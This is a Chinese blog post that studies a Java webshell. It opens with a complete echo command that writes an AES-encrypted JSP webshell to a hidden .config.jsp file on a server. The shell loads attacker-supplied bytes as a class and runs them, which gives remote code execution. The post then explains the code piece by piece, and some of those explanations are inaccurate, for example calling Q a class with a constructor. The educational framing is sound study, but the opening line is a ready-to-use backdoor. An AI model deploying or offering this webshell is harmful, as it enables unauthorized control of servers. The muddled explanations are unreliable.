<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            归档
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">大马学习</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2023-08-16
                        </span>
                        
                            <span id="/2023/08/16/大马学习/" class="leancloud_visitors" data-flag-title="大马学习">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2023/08/16/大马学习/"></span>
                        </span>  
                    </p>
                    
                        
                            <span class="category-color">🐎马的学习</span>
                        
                    
                    
                        
                            <span class="tag-color">🐎马的学习</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h1 id="java马的学习"><a href="#java马的学习" class="headerlink" title="java马的学习"></a>java马的学习</h1><h2 id="马的代码"><a href="#马的代码" class="headerlink" title="马的代码"></a>马的代码</h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo ^<span class="string">&quot;^&lt;^%! String xc=^&quot;</span>c6ef347ba29e0a7c^<span class="string">&quot;; class X extends ClassLoader&#123;public X(ClassLoader z)&#123;super(z);&#125;public Class Q(byte[] cb)&#123;return super.defineClass(cb, 0, cb.length);&#125; &#125;public byte[] x(byte[] s,boolean m)&#123; try&#123;javax.crypto.Cipher c=javax.crypto.Cipher.getInstance(^&quot;</span>AES^<span class="string">&quot;);c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),^&quot;</span>AES^<span class="string">&quot;));return c.doFinal(s); &#125;catch (Exception e)&#123;return null; &#125;&#125; ^%^&gt;^&lt;^%try&#123;byte[] data=new byte[Integer.parseInt(request.getHeader(^&quot;</span>Content-Length^<span class="string">&quot;))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))^&lt;data.length);data=x(data, false);if (session.getAttribute(^&quot;</span>payload^<span class="string">&quot;)==null)&#123;session.setAttribute(^&quot;</span>payload^<span class="string">&quot;,new X(this.getClass().getClassLoader()).Q(data));&#125;else&#123;request.setAttribute(^&quot;</span>parameters^<span class="string">&quot;, data);Object f=((Class)session.getAttribute(^&quot;</span>payload^<span class="string">&quot;)).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));&#125; &#125;catch (Exception e)&#123;&#125; ^%^&gt;^&quot;</span> &gt; .config.jsp</span><br></pre></td></tr></table></figure>

<h2 id="总讲"><a href="#总讲" class="headerlink" title="总讲"></a>总讲</h2><h3 id="第一部分："><a href="#第一部分：" class="headerlink" title="第一部分："></a>第一部分：</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo <span class="string">&quot;^%! String xc=\&quot;c6ef347ba29e0a7c\&quot;; class X extends ClassLoader &#123; public X(ClassLoader z) &#123; super(z); &#125; public Class Q(byte[] cb) &#123; return super.defineClass(cb, 0, cb.length); &#125; &#125;</span></span><br></pre></td></tr></table></figure>

<p>这部分代码定义了一个名为<code>X</code>的类，继承自<code>ClassLoader</code>类。<code>X</code>类包含了一个构造函数和一个名为<code>Q</code>的方法。构造函数接受一个<code>ClassLoader</code>类型的参数，并调用父类的构造函数进行初始化。<code>Q</code>方法接受一个字节数组参数<code>cb</code>，使用父类的<code>defineClass</code>方法将字节数组转换为类对象，并返回该类对象。</p>
<h3 id="第二部分："><a href="#第二部分：" class="headerlink" title="第二部分："></a>第二部分：</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="type">byte</span>[] x(<span class="type">byte</span>[] s, <span class="type">boolean</span> m) &#123;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        javax.crypto.<span class="type">Cipher</span> <span class="variable">c</span> <span class="operator">=</span> javax.crypto.Cipher.getInstance(<span class="string">&quot;AES&quot;</span>);</span><br><span class="line">        c.init(m ? javax.crypto.Cipher.ENCRYPT_MODE : javax.crypto.Cipher.DECRYPT_MODE, <span class="keyword">new</span> <span class="title class_">javax</span>.crypto.spec.SecretKeySpec(xc.getBytes(), <span class="string">&quot;AES&quot;</span>));</span><br><span class="line">        <span class="keyword">return</span> c.doFinal(s);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这部分代码定义了一个名为<code>x</code>的方法，接受一个字节数组参数<code>s</code>和一个布尔类型参数<code>m</code>。在方法内部，通过调用<code>javax.crypto.Cipher.getInstance(&quot;AES&quot;)</code>方法，创建了一个使用AES算法的<code>Cipher</code>对象<code>c</code>。</p>
<p><code>getInstance</code>方法接受一个表示加密算法和模式的字符串参数，这里传入的参数是”AES”，表示使用AES算法进行加密和解密。</p>
<p>返回的<code>Cipher</code>对象<code>c</code>可以用于执行AES算法的加密和解密操作。。然后使用<code>init</code>方法初始化<code>c</code>对象，根据<code>m</code>参数的值来确定是加密还是解密操作。接下来，使用<code>javax.crypto.spec.SecretKeySpec</code>类创建一个密钥对象，并将密钥字节数组传递给它。最后，调用<code>doFinal</code>方法对输入的字节数组进行加密或解密操作，并返回结果。</p>
<h3 id="c-doFinal-s"><a href="#c-doFinal-s" class="headerlink" title="c.doFinal(s)"></a>c.doFinal(s)</h3><p>要在Java中使用<code>c.doFinal(s)</code>返回加密后的结果，你需要先创建一个<code>Cipher</code>对象，并使用适当的密钥和加密模式进行初始化。然后，你可以调用<code>doFinal()</code>方法来对字符串<code>s</code>进行加密操作，并将加密后的结果返回。</p>
<h3 id="catch块"><a href="#catch块" class="headerlink" title="catch块"></a><code>catch</code>块</h3><p>在Java中，使用<code>catch</code>块来捕获异常并返回<code>null</code>是一种常见的错误处理方式。当在<code>try</code>块中的代码抛出异常时，程序会跳转到<code>catch</code>块中执行相应的处理逻辑。在这种情况下，如果发生异常，你可以返回<code>null</code>来表示出现了错误。</p>
<p>以下是一个示例代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="comment">// 一些可能抛出异常的代码</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">return</span> c.doFinal(s);</span><br><span class="line">&#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上述代码中，如果在<code>try</code>块中的<code>c.doFinal(s)</code>方法抛出异常，程序将跳转到<code>catch</code>块中，并返回<code>null</code>。</p>
<p>以下是一个示例代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Cipher</span> <span class="variable">c</span> <span class="operator">=</span> Cipher.getInstance(<span class="string">&quot;AES/ECB/PKCS5Padding&quot;</span>);</span><br><span class="line">c.init(Cipher.ENCRYPT_MODE, key);</span><br><span class="line"><span class="type">byte</span>[] encryptedBytes = c.doFinal(s.getBytes());</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> encryptedBytes;</span><br></pre></td></tr></table></figure>

<p>在上述代码中，<code>key</code>是一个合适的密钥，可以根据你的需求进行设置。如果在加密或解密过程中发生异常，将返回<code>null</code>。</p>
<h3 id="第三部分："><a href="#第三部分：" class="headerlink" title="第三部分："></a>第三部分：</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="type">byte</span>[] data = <span class="keyword">new</span> <span class="title class_">byte</span>[Integer.parseInt(request.getHeader(<span class="string">&quot;Content-Length&quot;</span>))];</span><br><span class="line">    java.io.<span class="type">InputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> request.getInputStream();</span><br><span class="line">    <span class="type">int</span> <span class="variable">_num</span> <span class="operator">=</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span> ((_num += inputStream.read(data, _num, data.length)) &lt; data.length);</span><br><span class="line">    data = x(data, <span class="literal">false</span>);</span><br><span class="line">    <span class="keyword">if</span> (session.getAttribute(<span class="string">&quot;payload&quot;</span>) == <span class="literal">null</span>) &#123;</span><br><span class="line">        session.setAttribute(<span class="string">&quot;payload&quot;</span>, <span class="keyword">new</span> <span class="title class_">X</span>(<span class="built_in">this</span>.getClass().getClassLoader()).Q(data));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        request.setAttribute(<span class="string">&quot;parameters&quot;</span>, data);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">f</span> <span class="operator">=</span> ((Class) session.getAttribute(<span class="string">&quot;payload&quot;</span>)).newInstance();</span><br><span class="line">        java.io.<span class="type">ByteArrayOutputStream</span> <span class="variable">arrOut</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">java</span>.io.ByteArrayOutputStream();</span><br><span class="line">        f.equals(arrOut);</span><br><span class="line">        f.equals(pageContext);</span><br><span class="line">        f.toString();</span><br><span class="line">        response.getOutputStream().write(x(arrOut.toByteArray(), <span class="literal">true</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这部分代码包含了一个<code>try-catch</code>块。在<code>try</code>块中，首先根据请求头中的”Content-Length”字段创建一个字节数组<code>data</code>。然后获取请求的输入流，并使用<code>read</code>方法将输入流中的数据读取到<code>data</code>数组中。接下来，调用<code>x</code>方法对<code>data</code>数组进行解密操作。如果<code>session</code>中不存在名为”payload”的属性，将创建一个<code>X</code>类的实例，并调用<code>Q</code>方法将解密后的数据转换为类对象，并将其存储在<code>session</code>中的”payload”属性中。如果<code>session</code>中已存在”payload”属性，则将解密后的数据存储在请求的属性”parameters”中。然后，创建一个名为<code>f</code>的对象，该对象是”payload”属性所表示的类的实例。接着，创建一个<code>java.io.ByteArrayOutputStream</code>对象<code>arrOut</code>，并通过调用<code>equals</code>方法来操作<code>f</code>对象。最后，将<code>arrOut</code>对象的字节数组通过<code>response</code>的输出流写入响应中。</p>
<h3 id="try块"><a href="#try块" class="headerlink" title="try块"></a><code>try</code>块</h3><p>在Java中，使用<code>try</code>块来处理可能抛出异常的代码是一种良好的编程实践。在这种情况下，你正在尝试从HTTP请求头中获取<code>Content-Length</code>的值，并将其解析为整数，然后创建一个相应大小的字节数组<code>data</code>。</p>
<p>以下是一个示例代码：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    <span class="type">int</span> <span class="variable">contentLength</span> <span class="operator">=</span> Integer.parseInt(request.getHeader(<span class="string">&quot;Content-Length&quot;</span>));</span><br><span class="line">    <span class="type">byte</span>[] data = <span class="keyword">new</span> <span class="title class_">byte</span>[contentLength];</span><br><span class="line">    <span class="comment">// 其他处理data的代码</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125; <span class="keyword">catch</span> (NumberFormatException e) &#123;</span><br><span class="line">    <span class="comment">// 处理解析整数异常的逻辑</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">    <span class="comment">// 处理其他异常的逻辑</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上述代码中，我们首先使用<code>parseInt()</code>方法将<code>Content-Length</code>的值解析为整数，并将其存储在变量<code>contentLength</code>中。然后，我们创建一个大小为<code>contentLength</code>的字节数组<code>data</code>，并在<code>try</code>块中进行进一步的处理。</p>
<h3 id="new-X-this-getClass-getClassLoader-Q-data"><a href="#new-X-this-getClass-getClassLoader-Q-data" class="headerlink" title="new X(this.getClass().getClassLoader()).Q(data)"></a>new X(this.getClass().getClassLoader()).Q(data)</h3><p><code>new X(this.getClass().getClassLoader()).Q(data)</code>是一个用于生成属性值的表达式。它可能是一个自定义类<code>X</code>的实例化，并调用其<code>Q(data)</code>方法来生成属性值。</p>
<h2 id="解释ClassLoader"><a href="#解释ClassLoader" class="headerlink" title="解释ClassLoader"></a>解释ClassLoader</h2><p><code>ClassLoader</code>是Java中的一个类，它是用于加载Java类的重要组件。它负责将类的字节码文件加载到Java虚拟机中，并将其转换为可执行的Java类。<code>ClassLoader</code>提供了一种机制，可以根据需要动态加载类，以实现类的动态扩展和灵活性。</p>
<p>在Java中，有三种主要的<code>ClassLoader</code>实现：<code>Bootstrap ClassLoader</code>、<code>Extension ClassLoader</code>和<code>System ClassLoader</code>。<code>Bootstrap ClassLoader</code>是Java虚拟机的一部分，用于加载Java核心类库。<code>Extension ClassLoader</code>用于加载Java扩展类库，而<code>System ClassLoader</code>（也称为应用程序类加载器）则用于加载应用程序的类。</p>
<h2 id=""><a href="#" class="headerlink" title=""></a></h2><h2 id="class-X-extends-ClassLoader-public-X-ClassLoader-z-super-z"><a href="#class-X-extends-ClassLoader-public-X-ClassLoader-z-super-z" class="headerlink" title="class X extends ClassLoader{public X(ClassLoader z){super(z);}"></a>class X extends ClassLoader{public X(ClassLoader z){super(z);}</h2><p>这段代码的意思是定义了一个名为X的类，它继承自ClassLoader类。构造函数X(ClassLoader z)接受一个ClassLoader对象作为参数，并通过调用父类的构造函数super(z)来初始化X类的ClassLoader。</p>
<p>在Java中，ClassLoader类用于加载Java类文件到内存中，并将其转换为可执行的Java对象。通过继承ClassLoader类，我们可以自定义类加载器的行为，例如自定义加载路径、加载策略等。</p>
<p>这段代码的作用是创建一个自定义的类加载器X，并使用传入的ClassLoader对象z作为父类加载器。通过这种方式，我们可以实现自定义的类加载逻辑，满足特定的需求，例如加载特定的类文件或者对类加载过程进行特殊处理。</p>
<h3 id="super"><a href="#super" class="headerlink" title="super"></a>super</h3><p>在Java中，<code>super</code>是一个关键字，用于引用父类的成员变量、方法或构造函数。它的作用是在子类中访问父类的成员，以便进行重写或扩展。</p>
<p>当子类需要调用父类的构造函数时，可以使用<code>super</code>关键字来调用父类的构造函数并完成对父类的初始化。在构造函数中使用<code>super</code>关键字时，它必须作为构造函数中的第一条语句。</p>
<p><code>super</code>还可以用于调用父类的方法或访问父类的成员变量。通过使用<code>super</code>关键字，子类可以访问父类中被隐藏的成员变量或方法，或者在子类中对父类的方法进行重写时，可以使用<code>super</code>关键字调用父类的方法。</p>
<p><code>super(z)</code>的作用是调用父类<code>ClassLoader</code>的构造函数并传递参数<code>z</code>。通过调用父类的构造函数，子类<code>X</code>可以继承父类的属性和方法，并且在构造对象时可以对父类进行初始化操作。在这个特定的例子中，<code>super(z)</code>用于初始化子类<code>X</code>的父类<code>ClassLoader</code>。这样做可以确保子类对象在创建时具有父类的属性和方法。</p>
<h2 id="public-Class-Q-byte-cb-return-super-defineClass-cb-0-cb-length"><a href="#public-Class-Q-byte-cb-return-super-defineClass-cb-0-cb-length" class="headerlink" title="public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);}"></a>public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);}</h2><p>这是一个示例代码，定义了一个名为<code>Q</code>的类，它包含一个构造函数和一个方法。构造函数接受一个<code>byte</code>数组类型的参数<code>cb</code>，而方法<code>defineClass</code>使用了<code>super</code>关键字来调用父类的<code>defineClass</code>方法。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Q</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Q</span><span class="params">(<span class="type">byte</span>[] cb)</span> &#123;</span><br><span class="line">        <span class="comment">// 构造函数的具体实现</span></span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">public</span> Class <span class="title function_">defineClass</span><span class="params">(<span class="type">byte</span>[] cb, <span class="type">int</span> offset, <span class="type">int</span> length)</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">super</span>.defineClass(cb, offset, length);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在上面的代码中，构造函数的实现被省略了，你可以根据具体需求来编写构造函数的逻辑。而方法<code>defineClass</code>使用了<code>super</code>关键字来调用父类的<code>defineClass</code>方法，并将参数<code>cb</code>、<code>offset</code>和<code>length</code>传递给父类方法，以完成对父类方法的调用。</p>
<p>在Java中，关键字<code>return</code>用于从方法中返回一个值或终止方法的执行。在你提供的代码中，<code>return</code>语句用于返回<code>super.defineClass(cb, offset, length)</code>的结果。</p>
<p><code>super</code>关键字用于引用父类的成员，包括方法。在这里，<code>super</code>表示当前类的父类，而<code>defineClass</code>是父类<code>ClassLoader</code>的一个受保护方法。通过调用<code>super.defineClass(cb, offset, length)</code>，你将调用父类的<code>defineClass</code>方法，并将<code>cb</code>、<code>offset</code>和<code>length</code>作为参数传递给它。然后，<code>return</code>语句将返回该方法的结果。</p>
<h3 id="defineClass"><a href="#defineClass" class="headerlink" title="defineClass"></a>defineClass</h3><p>defineClass<code>是</code>ClassLoader&#96;类中的一个方法，用于将字节数组转换为Java类的实例。它的定义如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">final</span> Class&lt;?&gt; defineClass(String name, <span class="type">byte</span>[] b, <span class="type">int</span> off, <span class="type">int</span> len)</span><br></pre></td></tr></table></figure>

<p>这个方法将字节数组<code>b</code>中的字节转换为一个新的Java类，并使用指定的类名<code>name</code>。参数<code>off</code>和<code>len</code>用于指定字节数组中要转换的字节的偏移量和长度。转换后的类将被定义在当前类加载器的命名空间中，并返回一个<code>Class</code>对象，可以用于操作和实例化该类。</p>
<p>需要注意的是，<code>defineClass</code>方法是一个受保护的方法，只能在类加载器的子类中被调用。它通常在自定义类加载器的实现中使用，用于加载非标准的类文件格式或从其他来源动态生成的字节码。</p>
<h2 id="javax-crypto-Cipher-getInstance"><a href="#javax-crypto-Cipher-getInstance" class="headerlink" title="javax.crypto.Cipher.getInstance"></a>javax.crypto.Cipher.getInstance</h2><p><code>javax.crypto.Cipher.getInstance</code>是一个用于获取<code>Cipher</code>对象的静态方法。它的定义如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Cipher <span class="title function_">getInstance</span><span class="params">(String transformation)</span> <span class="keyword">throws</span> NoSuchAlgorithmException, NoSuchPaddingException</span><br></pre></td></tr></table></figure>

<p>该方法接受一个表示加密算法和模式的字符串参数<code>transformation</code>，并返回一个<code>Cipher</code>对象，用于执行加密和解密操作。通过指定不同的<code>transformation</code>参数，可以使用不同的加密算法和模式。</p>
<p>需要注意的是，<code>getInstance</code>方法可能会抛出<code>NoSuchAlgorithmException</code>和<code>NoSuchPaddingException</code>异常，这取决于传入的<code>transformation</code>参数是否有效。</p>
<h2 id="c-init用于初始化Cipher对象c的加密或解密模式，并指定密钥和算法。"><a href="#c-init用于初始化Cipher对象c的加密或解密模式，并指定密钥和算法。" class="headerlink" title="c.init用于初始化Cipher对象c的加密或解密模式，并指定密钥和算法。"></a><code>c.init</code>用于初始化<code>Cipher</code>对象<code>c</code>的加密或解密模式，并指定密钥和算法。</h2><p>根据代码中的条件表达式<code>m ? javax.crypto.Cipher.ENCRYPT_MODE : javax.crypto.Cipher.DECRYPT_MODE</code>，如果条件<code>m</code>为真，则选择加密模式（<code>javax.crypto.Cipher.ENCRYPT_MODE</code>），否则选择解密模式（<code>javax.crypto.Cipher.DECRYPT_MODE</code>）。</p>
<p>然后，使用<code>new javax.crypto.spec.SecretKeySpec(xc.getBytes(), &quot;AES&quot;)</code>创建一个<code>SecretKeySpec</code>对象，该对象将<code>xc</code>字符串的字节数组作为密钥，使用AES算法进行加密或解密。</p>
<p>最后，<code>c.init</code>方法将加密或解密模式和密钥传递给<code>Cipher</code>对象<code>c</code>，以便后续的加密或解密操作。</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="/image/sidebar/touxiang.jpg" alt="章鱼海绵">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>章鱼海绵
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/2023/08/16/%E5%A4%A7%E9%A9%AC%E5%AD%A6%E4%B9%A0/" target="_blank">大马学习</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>简单地活着, 肆意又精彩.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                    <div class="category">
                        分类：
                        
                            <a href="/categorie/%F0%9F%90%8E%E9%A9%AC%E7%9A%84%E5%AD%A6%E4%B9%A0/">🐎马的学习</a>
                        
                    </div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tag/%F0%9F%90%8E%E9%A9%AC%E7%9A%84%E5%AD%A6%E4%B9%A0/">🐎马的学习</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                    
                        <a href="/2023/07/03/python%E7%88%AC%E8%99%AB%E5%AD%A6%E4%B9%A0/" class="next-prefix">» </a> 下一篇：    <a href="/2023/07/03/python%E7%88%AC%E8%99%AB%E5%AD%A6%E4%B9%A0/" title="发布于 2023-07-03 02:55"></a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>

        </div>
    
</div>
    <div id="footer"></div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>简单地活着，肆意而又精彩！</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="/image/sidebar/touxiang.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user"><span>章鱼海绵</span></div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=" active "><a href="/archive" class="" target="_self"><span class="iconfont icon-calendar-fill"></span>归档</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="/atom.xml" class="" target="_blank"><span class="iconfont icon-rss"></span>订阅</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="知乎" href="https://www.4399.com/" class="" target="_blank" data=""><span class="iconfont icon-zhihu"></span></a>
                
                    <a name="微博" href="https://www.4399.com/" class="" target="_blank" data=""><span class="iconfont icon-weibo"></span></a>
                
                    <a name="QQ" href="javascript:;" class="image" target="_self" data="/image/sidebar/qq.png"><span class="iconfont icon-qq"></span></a>
                
                    <a name="微信" href="javascript:;" class="" target="_self" data="/image/sidebar/weixin.png"><span class="iconfont icon-wechat"></span></a>
                
                    <a name="GitHub" href="https://github.com/zhangyuhaimian/zhangyuhaimian.github.io" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>

    
        <div class="aplayer"></div>
        <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
        <script type="text/javascript" src="/js/APlayer.min.js"></script>
        <script type="text/javascript">
            const aplayer = new APlayer({
                container: document.querySelector(".aplayer"),
                fixed: true,
                autoplay: true,
                loop: "all",
                order: "random",
                preload: "auto",
                volume: 0.67,
                mutex: true,
                lrcType: 3,
                audio: [
                    
                        {
                            name: "镇海",
                            artist: "不良人",
                            cover: "/music/cover/shuai.jpg",
                            url: "/music/song/zhenhai.mp3",
                            lrc: "/music/lrc/Endless Tears.lrc"
                        },
                    
                ]
            });
        </script>
    
    
    <div class="wrap-right">
        <div class="setting">
            <div class="iconbox favorites" switch="false">
                <span class="iconfont icon-favorites"></span>
                <span class="icontext">关注</span>
            </div>
            <div class="iconbox mode">
                <div class="light">
                    <span class="iconfont icon-daymode"></span>
                    <span class="icontext">浅色模式</span>
                </div>
                <div class="dark">
                    <span class="iconfont icon-nightmode-fill"></span>
                    <span class="icontext">深色模式</span>
                </div>
            </div>
